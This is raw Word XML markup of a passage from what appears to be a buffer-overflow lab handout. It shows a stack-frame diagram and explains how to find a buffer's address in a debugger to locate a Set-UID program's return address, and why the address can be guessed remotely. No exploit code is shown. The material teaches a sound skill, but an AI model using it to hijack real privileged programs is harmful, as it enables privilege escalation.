        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2307" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto" w:before="68"/>
              <w:ind w:left="276" w:right="272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w w:val="105"/>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t>str</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial MT"/>
                <w:spacing w:val="-5"/>
                <w:w w:val="105"/>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial MT"/>
                <w:w w:val="105"/>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t>(a</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial MT"/>
                <w:spacing w:val="-5"/>
                <w:w w:val="105"/>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial MT"/>
                <w:w w:val="105"/>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t>pointer</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial MT"/>
                <w:spacing w:val="-5"/>
                <w:w w:val="105"/>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial MT"/>
                <w:w w:val="105"/>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t>to</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial MT"/>
                <w:spacing w:val="-5"/>
                <w:w w:val="105"/>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial MT"/>
                <w:w w:val="105"/>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t>a</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial MT"/>
                <w:spacing w:val="-5"/>
                <w:w w:val="105"/>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial MT"/>
                <w:w w:val="105"/>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t>string)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="298" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2307" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto" w:before="68"/>
              <w:ind w:left="274" w:right="272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w w:val="105"/>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t>Return</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial MT"/>
                <w:spacing w:val="-9"/>
                <w:w w:val="105"/>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial MT"/>
                <w:w w:val="105"/>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t>Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="298" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2307" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto" w:before="68"/>
              <w:ind w:left="276" w:right="272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w w:val="105"/>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t>Previous</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial MT"/>
                <w:spacing w:val="-9"/>
                <w:w w:val="105"/>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial MT"/>
                <w:w w:val="105"/>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t>Frame</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial MT"/>
                <w:spacing w:val="-8"/>
                <w:w w:val="105"/>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial MT"/>
                <w:w w:val="105"/>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t>Pointer</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial MT"/>
                <w:spacing w:val="-8"/>
                <w:w w:val="105"/>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial MT"/>
                <w:w w:val="105"/>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t>(FP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="298" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2307" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto" w:before="68"/>
              <w:ind w:left="275" w:right="272"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial MT" w:hAnsi="Arial MT"/>
                <w:sz w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial MT" w:hAnsi="Arial MT"/>
                <w:spacing w:val="-1"/>
                <w:w w:val="105"/>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t>buffer[0]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial MT" w:hAnsi="Arial MT"/>
                <w:spacing w:val="-7"/>
                <w:w w:val="105"/>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial MT" w:hAnsi="Arial MT"/>
                <w:w w:val="105"/>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t>…</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial MT" w:hAnsi="Arial MT"/>
                <w:spacing w:val="-6"/>
                <w:w w:val="105"/>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial MT" w:hAnsi="Arial MT"/>
                <w:w w:val="105"/>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t>buffer[11]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="298" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2307" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto" w:before="68"/>
              <w:ind w:left="276" w:right="272"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial MT"/>
                <w:sz w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial MT"/>
                <w:w w:val="105"/>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t>variable_a</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="298" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="23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44" w:lineRule="auto" w:before="104"/>
        <w:ind w:left="160" w:right="437"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Finding the address of the memory that stores the return address.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="56"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>From the figure, we know, if we</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="37"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>find</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="36"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="38"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="36"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>address</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="37"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="37"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>buffer[]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-37"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>array,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="42"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>we</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="37"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="37"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>calculate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="36"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>where</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="38"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="36"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="38"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>address</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="37"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="36"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>stored.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="45"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Since</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-50"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>the vulnerable program is a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Set-UID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>program, you can make a copy of this program, and run it with your</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>own</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="43"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>privilege;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="42"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>way</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="43"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>you</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="42"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="43"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>debug</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="43"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="42"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>program</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="43"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>(note</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="42"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="43"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>you</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="43"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>cannot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="42"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>debug</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="43"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="43"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Set-UID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-30"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>program).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-50"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>In the debugger, you can figure out the address of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>buffer[]</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, and thus calculate the starting point of the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>malicious code.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>You can even modify the copied program, and ask the program to directly print out the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>address of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>buffer[]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>The address of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>buffer[] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>may be slightly different when you run the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Set-UID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="1"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>copy,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2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copy,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quite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>close.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="256" w:lineRule="auto" w:before="11"/>
        <w:ind w:left="160" w:right="437" w:firstLine="338"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>If the target program is running remotely, and you may not be able to rely on the debugger to find out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address.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3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always</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>guess</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3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facts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>make</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>guessing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quite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>feasible</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>approach:</w:t>
      </w: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240" w:lineRule="auto" w:before="166" w:after="0"/>
        <w:ind w:left="705" w:right="0" w:hanging="219"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Stack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>usually</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>starts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same</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>address.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00" w:footer="0" w:top="1280" w:bottom="280" w:left="1280" w:right="100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56" w:lineRule="auto" w:before="97"/>
        <w:ind w:left="705" w:right="426"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape style="position:absolute;margin-left:88.363998pt;margin-top:6.665001pt;width:5.5pt;height:18.95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pStyle w:val="BodyText"/>
                    <w:spacing w:line="231" w:lineRule="exact"/>
                    <w:rPr>
                      <w:rFonts w:ascii="MS UI Gothic" w:hAnsi="MS UI Gothic"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="MS UI Gothic" w:hAnsi="MS UI Gothic"/>
                      <w:w w:val="24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Stack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usually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very</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>deep:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>most</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>programs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push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few</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>hundred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few</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>thousand</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-52"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>bytes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stack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time.</w:t>
      </w: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240" w:lineRule="auto" w:before="165" w:after="0"/>
        <w:ind w:left="705" w:right="0" w:hanging="219"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Therefore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range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addresses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guess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actually</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>quite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>small.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:pos="4735" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="252" w:lineRule="auto" w:before="323"/>
        <w:ind w:left="160" w:right="239"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:group style="position:absolute;margin-left:163.609955pt;margin-top:97.540146pt;width:286.6pt;height:190pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-16246784" coordorigin="3272,1951" coordsize="5732,3800">
            <v:shape style="position:absolute;left:3721;top:2780;width:2888;height:714" coordorigin="3722,2781" coordsize="2888,714" path="m3818,2813l3722,2781,3722,2845,3818,2813xm6499,3300l6496,3296,6492,3300,6492,3314,6493,3317,6499,3317,6499,3300xm6499,3214l6496,3210,6492,3214,6492,3264,6496,3267,6499,3264,6499,3214xm6499,3128l6496,3124,6492,3128,6492,3178,6496,3182,6499,3178,6499,3128xm6499,3042l6496,3038,6492,3042,6492,3092,6496,3096,6499,3092,6499,3042xm6499,2954l6496,2953,6493,2954,6492,2956,6492,3006,6496,3010,6499,3006,6499,2954xm6603,3457l6505,3430,6509,3494,6603,3457xm6609,2813l6512,2781,6512,2845,6609,2813xe" filled="true" fillcolor="#000000" stroked="false">
              <v:path arrowok="t"/>
              <v:fill type="solid"/>
            </v:shape>
            <v:rect style="position:absolute;left:3275;top:1954;width:5725;height:3793" filled="false" stroked="true" strokeweight=".357768pt" strokecolor="#000000">
              <v:stroke dashstyle="solid"/>
            </v:rect>
            <v:shape style="position:absolute;left:5887;top:2169;width:358;height:2505" coordorigin="5887,2169" coordsize="358,2505" path="m6127,2169l6006,2169,6006,4495,5887,4495,6066,4673,6245,4495,6127,4495,6127,2169xe" filled="true" fillcolor="#dde2cd" stroked="false">
              <v:path arrowok="t"/>
              <v:fill type="solid"/>
            </v:shape>
            <v:shape style="position:absolute;left:5887;top:2169;width:358;height:2505" coordorigin="5887,2169" coordsize="358,2505" path="m6066,4673l6245,4495,6127,4495,6127,2169,6006,2169,6006,4495,5887,4495,6066,4673xe" filled="false" stroked="true" strokeweight=".119256pt" strokecolor="#000000">
              <v:path arrowok="t"/>
              <v:stroke dashstyle="solid"/>
            </v:shape>
            <v:shape style="position:absolute;left:3966;top:5487;width:1644;height:134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(a)</w:t>
